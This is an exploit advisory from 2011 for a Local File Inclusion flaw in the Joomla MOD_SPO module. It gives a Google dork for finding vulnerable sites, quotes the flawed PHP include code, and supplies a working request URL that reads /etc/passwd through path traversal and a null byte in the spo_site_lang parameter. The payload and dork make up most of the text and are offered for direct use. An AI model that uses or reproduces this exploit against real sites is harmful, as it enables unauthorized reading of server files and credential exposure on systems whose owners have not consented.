# Exploit Title: LFI Joomla Component MOD_SPO 
# Google Dork: inurl:MOD_SPO
# Date: 15/07/2011
# Author: Jbyte
# Software Link: http://extensions.joomla.org/extensions/style-a-design/accessibility/5974
# Version: 1.5.x 
# Tested on: Ubuntu 11.04, Windows xp


This Component of joomla has LFI(Local File Inclusion) you may call files of the server.


Vulnerable Code:

$s_lang =& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');


Exploit

http://www.example.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se

Visited: http://jbyte-security.blogspot.com/